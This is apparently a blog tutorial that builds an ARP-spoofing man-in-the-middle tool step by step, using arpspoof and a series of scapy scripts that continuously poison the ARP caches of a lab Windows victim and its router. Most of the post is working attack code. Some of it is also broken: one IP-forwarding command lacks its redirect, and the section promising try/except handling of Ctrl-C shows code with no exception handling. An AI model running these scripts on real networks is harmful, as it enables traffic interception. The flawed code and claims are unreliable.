Python Ethical Hacking - ARP Spoofing(1)

Typical Network

Python Ethical Hacking - ARP Spoofing(1)

ARP Spoofing

Python Ethical Hacking - ARP Spoofing(1)

Why ARP Spoofing is possible:

1. Clients accept responses even if they did not send a request.

2. Clients trust response without any form of verification.

Python Ethical Hacking - ARP Spoofing(1)

1. Run the following command on the victim - Windows 10 Machine.

arp -a

Python Ethical Hacking - ARP Spoofing(1)

2. Run the following command on the Kali Linux machine.

arp -a

Python Ethical Hacking - ARP Spoofing(1)

3. Use the tool arpspoof on the Kali Linux to perform the test.

arpspoof -i eth1 -t 10.0.0.210 10.0.0.1

arpspoof -i eth1 -t 10.0.0.1 10.0.0.210

Python Ethical Hacking - ARP Spoofing(1)

3. Perform the following command again on the victim Windows 10 machine. The MAC address of the router changed to the MAC address of Kali Linux.

arp -a

Python Ethical Hacking - ARP Spoofing(1)

4. Run the command on Kali Linux.

echo 1 > /proc/sys/net/ipv4/ip_forward

Python Ethical Hacking - ARP Spoofing(1)

4. Find useful information on the Kali and write the Python code.

Python Ethical Hacking - ARP Spoofing(1)

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
print(packet.show())
print(packet.summary())

Result:

Python Ethical Hacking - ARP Spoofing(1)

 

Python Script:

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
scapy.send(packet)

Execute the script on Kali and watch the change on the victim Windows 10 machine.

Python Ethical Hacking - ARP Spoofing(1)

 

Rewrite the Python Script.

#!/usr/bin/env python

import scapy.all as scapy

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")

Execute the script and watch the change on victim Windows 10 machine.

Python Ethical Hacking - ARP Spoofing(1)

 

Rewrite the Python script to perform the spoof continuously.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    time.sleep(2)

Enable the IP forward on Kali Linux.

echo 1 /proc/sys/net/ipv4/ip_forward

Now the target Win10 machine can browse the Internet normally.

Python Ethical Hacking - ARP Spoofing(1)

 

Python Ethical Hacking - ARP Spoofing(1)

 

 Use the while structure to show the packets sent count.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("[+] Packets sent:" + str(sent_packets_count))
    time.sleep(2)

 Execute the Python script.

Python Ethical Hacking - ARP Spoofing(1)

 

Rewrite the Python Script in Python2:

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execute the new script and find the change in the terminal.

Python Ethical Hacking - ARP Spoofing(1)

 

Rewrite the script in Python3 compatibility :

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count), end="")
    time.sleep(2)

 

HANDLING EXCEPTIONS

  • try/except can be used to handle errors.
  • Write default code in a try block.
  • Write code to run if an error occurs in except block.

-> if an error occurs exception block gets executed, otherwise try code gets executed.

 

Using the try ... catch structure to handle the KeyboardInterrupt Error.

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execution result:

Python Ethical Hacking - ARP Spoofing(1)

 

上一篇:Python Ethical Hacking - MAC Address & How to Change(3)


下一篇:Wireshark抓包软件学习